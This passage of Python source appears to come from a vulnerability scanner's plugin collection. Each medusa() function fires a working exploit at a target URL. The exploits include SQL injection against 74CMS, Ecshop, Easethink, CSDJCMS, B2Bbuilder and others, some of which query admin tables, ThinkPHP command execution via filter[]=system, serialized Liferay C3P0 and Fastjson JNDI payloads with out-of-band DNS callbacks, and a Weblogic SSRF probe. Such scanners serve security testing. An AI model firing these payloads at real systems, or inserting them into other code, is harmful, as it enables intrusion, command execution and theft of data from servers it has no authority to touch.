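    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # Session is closed on exit; the previous code leaked it.
        with requests.session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name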
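def medusa(Url, RandomAgent, UnixTimestamp):
    """Check ThinkPHP's captcha route for the _method/filter command execution.

    POSTs ``data`` to /index.php?s=captcha and records a finding when the 200
    response contains the three fields of ``id`` output ("uid=", "gid=",
    "groups=").

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        UnixTimestamp: passed through to VulnerabilityDetails(...).Write().

    Returns:
        None. No proxy support; any exception is written to ErrorLog and swallowed.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php?s=captcha"
        data = "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        resp = requests.post(payload_url, headers=headers, data=data, timeout=6, verify=False)
        con = resp.text
        if resp.status_code == 200 and con.find("uid=") != -1 and con.find("gid=") != -1 and con.find("groups=") != -1:
            Medusa = "{}存在ThinkPHP任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name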
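def medusa(Url, RandomAgent, Token, proxies=None):
    """Check ThinkPHP's route parser for template-expression evaluation.

    Requests a path carrying ``${@phpinfo()}`` and records a finding when the
    200 response contains the phpinfo() markers "PHP Version", "System" and
    "Build Date".

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        Token: passed through to VulnerabilityDetails(...).Write().
        proxies: proxy spec, normalised through Proxies().result().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if resp.status_code == 200 and con.find("PHP Version") != -1 and con.find("System") != -1 and con.find("Build Date") != -1:
            Medusa = "{}存在ThinkPHP任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回值:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, Token).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name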
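def medusa(Url, RandomAgent, Token, proxies=None):
    """Check Easethink for error-based SQL injection through the sort_field_idx cookie.

    The cookie carries ``extractvalue(1,concat(0x5c,md5(1)))``; a finding is
    recorded when the 200 response contains the digest prefix. The marker is
    31 characters — presumably because the error message truncates md5(1)
    (c4ca4238a0b923820dcc509a6f75849b) — confirm before "fixing" it.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        Token: passed through to VulnerabilityDetails(...).Write().
        proxies: proxy spec, normalised through Proxies().result().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))'
        }
        resp = requests.post(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if resp.status_code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849") != -1:
            Medusa = "{}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, Token).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name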
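def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check CmsEasy's cut_image tool for remote-file fetching.

    POSTs a ``pic=`` value pointing at an ftp:// URL and records a finding
    when the 200 response contains the fixed upload path the handler is
    known to return. NOTE(review): the report text says "跨站脚本漏洞" (XSS),
    which does not match what this probe tests; the wording is kept because
    the correct label is not verifiable from here.

    Args:
        Url: target URL, split by UrlProcessing().result().
        Headers: request headers supplied by the caller (used as-is).
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = '/index.php?case=tool&act=cut_image'
        data = 'pic=1ftp://192.168.1.5/phpinfo.php&w=700&h=1120&x1=0&x2=700&y1=0&y2=1120'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        # The "\/" sequences are not escapes in Python (the backslash is kept),
        # so this matches a JSON-escaped path in the body — presumably intended.
        if resp.status_code == 200 and con.find('\/upload\/images\/201612\/148159258747.php') != -1:
            Medusa = "{}存在CmsEasy跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, e)  # error log entry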
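def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check CSDJCMS's /dance/so/key/ route for union-based SQL injection.

    The double-encoded ``key`` selects ``md5(4684894)``; a finding is recorded
    when the response contains the quoted digest
    ('904c23abadd5a4648a973c86385f3930'). The status code is not checked.

    Args:
        Url: target URL, split by UrlProcessing().result().
        Headers: request headers supplied by the caller (used as-is).
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if con.find("'904c23abadd5a4648a973c86385f3930'") != -1:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, e)  # error log entry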
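def medusa(Url: str, RandomAgent: str, Token: str, proxies: str = None) -> None:
    """Check Liferay Portal's JSON web service for the deserialization issue (out-of-band).

    Builds the serialized C3P0 ``hex_data`` blob with a Dnslog() callback host
    substituted in, hex-encodes it with binascii into ``post_data`` and POSTs
    it to /api/jsonws/invoke. ``DL.result()`` (a project helper; semantics not
    visible here) decides whether the callback arrived and a finding is
    recorded if so.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        Token: passed through to VulnerabilityDetails(...).Write().
        proxies: proxy spec, normalised through Proxies().result().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = '/api/jsonws/invoke'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close"
        }
        DL = Dnslog()
        # bytes %-formatting: the callback host replaces the single %s.
        hex_data = b'\xac\xed\x00\x05sr\x00=com.mchange.v2.naming.ReferenceIndirector$ReferenceSerializedb\x19\x85\xd0\xd1*\xc2\x13\x02\x00\x04L\x00\x0bcontextNamet\x00\x13Ljavax/naming/Name;L\x00\x03envt\x00\x15Ljava/util/Hashtable;L\x00\x04nameq\x00~\x00\x01L\x00\treferencet\x00\x18Ljavax/naming/Reference;xppppsr\x00\x16javax.naming.Reference\xe8\xc6\x9e\xa2\xa8\xe9\x8d\t\x02\x00\x04L\x00\x05addrst\x00\x12Ljava/util/Vector;L\x00\x0cclassFactoryt\x00\x12Ljava/lang/String;L\x00\x14classFactoryLocationq\x00~\x00\x07L\x00\tclassNameq\x00~\x00\x07xpsr\x00\x10java.util.Vector\xd9\x97}[\x80;\xaf\x01\x03\x00\x03I\x00\x11capacityIncrementI\x00\x0celementCount[\x00\x0belementDatat\x00\x13[Ljava/lang/Object;xp\x00\x00\x00\x00\x00\x00\x00\x00ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\nppppppppppxt\x00\x03Expt\x00\x1b%st\x00\x03Foo' % DL.dns_host().encode('utf-8')
        data = str(binascii.hexlify(hex_data), encoding="utf-8")
        post_data = """cmd={"/expandocolumn/update-column":{}}&p_auth=<validtoken>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:""" + data + """;"}"""
        resp = requests.post(payload_url, data=post_data, headers=headers, proxies=proxies, timeout=6, verify=False)
        if DL.result():
            Medusa = "{}存在LiferayPortal远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n随机的DNSLOG:{}\r\n返回数据包:{}\r\n".format(url, payload_url, post_data, DL.dns_host(), resp.text)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, Token).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name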
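def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check Ecshop's category.php filter_attr parameter for error-based SQL injection.

    The probe extracts the first 50 characters of ``md5(3)``; a finding is
    recorded when the response contains "cbc87e4b5ce2fe28" (a fragment of that
    digest). The status code is not checked.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = '/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20AND%20EXTRACTVALUE(1218%2cCONCAT(0x5c%2c0x716f776c71%2c(MID((IFNULL(CAST(md5(3)%20AS%20CHAR)%2c0x20))%2c1%2c50))%2c0x7172737471))'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if con.find("cbc87e4b5ce2fe28") != -1:
            Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name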
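def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check Ecshop's admin/shopinfo.php id parameter for error-based SQL injection.

    The probe wraps ``md5(c)`` in updatexml(); a finding is recorded when the
    response contains the digest (4a8a08f09d37b73795649038408b5f33). The
    status code is not checked.

    Args:
        Url: target URL, split by UrlProcessing().result().
        RandomAgent: User-Agent string for the request.
        proxies: proxy spec, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails(...).Write().

    Returns:
        None. Exceptions are reported via ErrorHandling/ErrorLog, not raised.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL gave none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/admin/shopinfo.php?act=edit&id=1 and updatexml(1,concat(0x7e,(md5(c))),0)"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # record url and scan data
            WriteFile().result(str(url), str(Medusa))  # result file is keyed by target url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write(url, plugin_name)  # log target URL and the failing plugin name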
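def medusa(Url, RandomAgent, UnixTimestamp):
    """Check *Url* for the 74CMS ``ajax_street.php`` SQL-injection signature.

    Args:
        Url: Target as handed over by the framework; ``UrlProcessing`` splits
            it into scheme, host and port.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed to ``VulnerabilityDetails`` when a finding is
            written.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``;
        exceptions are handed to ``ErrorHandling`` and ``ErrorLog``.

    Changes from the original: the session is now closed via a context
    manager, the no-op ``else: port = port`` branch and the unused ``code``
    local were dropped, and the URL helper is called the way every sibling
    plugin calls it.
    """
    # NOTE(review): the original called UrlProcessing(Url) directly, unlike
    # every other plugin here, which uses UrlProcessing().result(Url); this
    # aligns with them — confirm against the helper's actual API.
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port only when none was supplied; unknown schemes keep None.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = "/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),1,1))=97 as signed) %23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # The session is closed on exit; verify=False disables TLS
        # certificate verification for the probe.
        with requests.Session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        # Match on the md5 value the probe asks the database to compute.
        if '4a8a08f09d37b73795649038408b5f33' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # url plus the scan output go to the details writer
            VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # url is the per-target output file name; Medusa is the result text
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:  # plugin boundary: record the failure, never raise
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write(url, _)  # log target URL and failing plugin name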
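def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check *Url* for Fastjson deserialization via an out-of-band DNS callback.

    Args:
        Url: Target as handed over by the framework; ``UrlProcessing`` splits
            it into scheme, host and port.
        Headers: Base request headers. They are copied before ``Content-Type``
            and ``Connection`` are set, so the caller's dict is left untouched.
        proxies: Proxy specification resolved through ``Proxies().result``;
            may be ``None``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails`` when a
            finding is written.

    Returns:
        None. A finding is written only when ``Dnslog().result()`` reports a
        callback *and* the server answered 400; exceptions are handed to
        ``ErrorHandling`` and ``ErrorLog``.

    Changes from the original: the caller's ``Headers`` dict is no longer
    mutated, the DNS-log host is fetched once so the report names the host
    that was actually sent, and the no-op ``else: port = port`` branch plus a
    commented-out hard-coded host were removed.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port only when none was supplied; unknown schemes keep None.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload_url = scheme + '://' + url + ':' + str(port)
        DL = Dnslog()
        # NOTE(review): fetched once and reused in the report; if dns_host()
        # hands out a fresh name per call this is the intended fix, otherwise
        # it is a no-op — confirm against Dnslog.
        dns_host = DL.dns_host()
        data = '''{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://%s/Exploit","autoCommit":true}''' % dns_host
        # Work on a copy so the shared Headers object is not changed for
        # whoever runs after this plugin.
        headers = dict(Headers)
        headers['Content-Type'] = 'application/json'
        headers["Connection"] = "close"
        # verify=False: TLS certificate verification is disabled for the probe.
        resp = requests.post(payload_url, headers=headers, data=data,
                             proxies=proxies, timeout=10, verify=False)
        if DL.result() and resp.status_code == 400:
            Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(
                url, payload_url, resp.text, dns_host)
            _t = VulnerabilityInfo(Medusa)
            # url plus the scan output go to the details writer
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # url is the per-target output file name; Medusa is the result text
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:  # plugin boundary: record the failure, never raise
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)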
# Weblogic SSRF check (labelled CVE-2014-4210 in its report strings).
# Sends a GET to the UDDI explorer search page carrying the operator=
# parameter shown in `payload` and, on HTTP 200, builds a "疑似" (suspected)
# report; when the body contains both "An error has occurred" and "Weblogic"
# the report text is replaced by the confirmed variant.
# Args: Url (target, split by UrlProcessing().result), Headers (sent as-is),
# proxies (resolved by Proxies().result), **kwargs (forwarded to
# VulnerabilityDetails). Returns None; exceptions go to ErrorHandling and
# ErrorLog.
# NOTE(review): the source is collapsed onto one line, so whether the
# VulnerabilityDetails/WriteFile calls sit under the HTTP-200 branch (every
# 200 is written as "suspected") or only under the confirmed branch cannot be
# told from here — confirm before relying on either reading.
# verify=False: TLS certificate verification is disabled for the probe, so
# the response is not authenticated to the host in Url.
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001' payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200: Medusa = "{}疑似存在Weblogic服务器端请求伪造漏洞(CVE-2014-4210)\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format( url, payload_url, con) if con.find("An error has occurred") != -1 and con.find( "Weblogic") != -1: Medusa = "{}存在Weblogic服务器端请求伪造漏洞(CVE-2014-4210)\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
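def medusa(Url, RandomAgent, UnixTimestamp):
    """Check *Url* for the CmsTop template-editor path-disclosure signature.

    Two candidate paths are requested in turn; each is handled in its own
    try block so a failure on one does not stop the next.

    Args:
        Url: Target as handed over by the framework; ``UrlProcessing`` splits
            it into scheme, host and port.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Passed to ``VulnerabilityDetails`` when a finding is
            written.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``;
        exceptions are logged via ``ErrorLog``.

    Changes from the original: the no-op ``else: port = port`` branch was
    dropped and the loop-invariant headers dict is built once.
    """
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port only when none was supplied; unknown schemes keep None.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    Payloads = [
        "/cmstop/apps/system/view/template/edit.php",
        "/apps/system/view/template/edit.php"
    ]
    headers = {
        'User-Agent': RandomAgent,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    for payload in Payloads:
        try:
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            # verify=False: TLS certificate verification is disabled.
            resp = requests.get(payload_url, headers=headers, timeout=6,
                                verify=False)
            con = resp.text
            # NOTE(review): this is a plain substring test, so the string is
            # matched literally, bracket-groups and all, not as a regular
            # expression; kept as in the original.
            if ' in <b>([^<]+)</b> on line <b>(\\d+)</b>' in con:
                Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                # url plus the scan output go to the details writer
                VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
                # url is the per-target output file name; Medusa is the result
                WriteFile().result(str(url), str(Medusa))
        except Exception:  # per-payload boundary: log and move on
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorLog().Write(url, _)  # log target URL and failing plugin name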
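def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check *Url* for the B2Bbuilder ``main.php`` SQL-injection signature.

    Args:
        Url: Target as handed over by the framework; ``UrlProcessing`` splits
            it into scheme, host and port.
        Headers: Request headers, sent as given.
        proxies: Proxy specification resolved through ``Proxies().result``;
            may be ``None``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails`` when a
            finding is written.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``;
        exceptions are handed to ``ErrorHandling`` and ``ErrorLog``.

    Changes from the original: the report template had three placeholders but
    was given four values, so the response body was silently dropped and the
    POST body was shown under 漏洞详情; it now receives url, payload_url and
    the response like the sibling plugins. The no-op ``else: port = port``
    branch was dropped and the URL helper is called as every sibling calls it.
    """
    proxies = Proxies().result(proxies)
    # NOTE(review): the original called UrlProcessing(Url) directly, unlike
    # every other plugin here, which uses UrlProcessing().result(Url); this
    # aligns with them — confirm against the helper's actual API.
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port only when none was supplied; unknown schemes keep None.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        payload = '/main.php?m=buy&s=admin/add_cat&id=111'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        data = "cat=1&pid=1 or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,md5(c)) from hy_admin))),0) %23"
        # verify=False: TLS certificate verification is disabled for the probe.
        resp = requests.post(payload_url, data=data, headers=Headers,
                             proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # Success needs a 200 plus the md5 value the probe asks the database
        # to compute.
        if code == 200 and "4a8a08f09d37b73795649038408b5f33" in con:
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # url plus the scan output go to the details writer
            VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # url is the per-target output file name; Medusa is the result text
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:  # plugin boundary: record the failure, never raise
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)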
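def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check *Url* for the ECGAP SQL-injection signature on three endpoints.

    Each candidate path in ``Payloads`` gets the same query suffix appended
    and is requested in its own try block, so one failure does not stop the
    others.

    Args:
        Url: Target as handed over by the framework; ``UrlProcessing`` splits
            it into scheme, host and port.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy specification resolved through ``Proxies().result``;
            may be ``None``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails`` when a
            finding is written.

    Returns:
        None. Findings go to ``VulnerabilityDetails`` and ``WriteFile``;
        exceptions are handed to ``ErrorHandling`` and ``ErrorLog``.

    Changes from the original: the no-op ``else: port = port`` branch was
    dropped and the loop-invariant suffix and headers are built once.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port only when none was supplied; unknown schemes keep None.
    if port is None:
        port = {'https': 443, 'http': 80}.get(scheme)
    Payloads = [
        "/Login/Log.aspx?loginname=",
        "/ViewSource/SrcWorkProgram.aspx?infoflowId=",
        "/OnlineQuery/GetFlowItem.aspx?DeptId="
    ]
    # Same suffix for every path; the response is checked for the MD5 value
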